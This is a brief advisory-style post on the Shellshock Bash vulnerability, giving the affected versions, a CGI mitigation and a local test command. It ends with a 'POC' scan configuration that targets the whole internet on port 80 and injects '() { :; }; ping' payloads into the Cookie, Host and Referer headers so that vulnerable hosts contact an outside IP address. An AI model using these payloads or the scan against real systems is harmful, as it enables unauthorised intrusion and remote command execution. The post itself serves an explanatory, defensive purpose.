Newest contender in the market for being the biggest vulnerability discovered. Introduction to it:
What assets are vulnerable?
Bash shells – in other words all assets running unix/linux Operating Systems. This includes servers, networking devices, firewalls, appliance boxes
Which versions of Bash are affected?
Everything through version 4.3. Which means about 25 years’ worth of versions!!
When was this publicly announced?
On Wed 24th around noon (GMT).
This means all the bad guys out there, have the code to attack since then. The longer we wait to defend ourselves, the more likelihood we will become a victim
Mitigating Controls:
simply to disable any CGI functionality that makes calls to a shell and indeed some are recommending this. In many cases though, that’s going to be a seriously breaking change and at the very least, one that going to require some extensive testing to ensure it doesn’t cause immediate problems
How to check if my asset is vulnerable?
There’s a very simple test - which is just running this command within your shell:
env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"
If you get “busted” echo’d back out and you’ve successfully exploited the bug.
Exploit’s POC?
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74 *
http-header = Host:() { :; }; ping -c 3 209.126.230.74 *
http-header = Referer:() { :; }; ping -c 3 209.126.230.74 *
* Essentially asking the vulnerable assets to ping the attacker. This is what a white-hat (non-malicious) attacker would do. A bad-guy would code in something much more sinister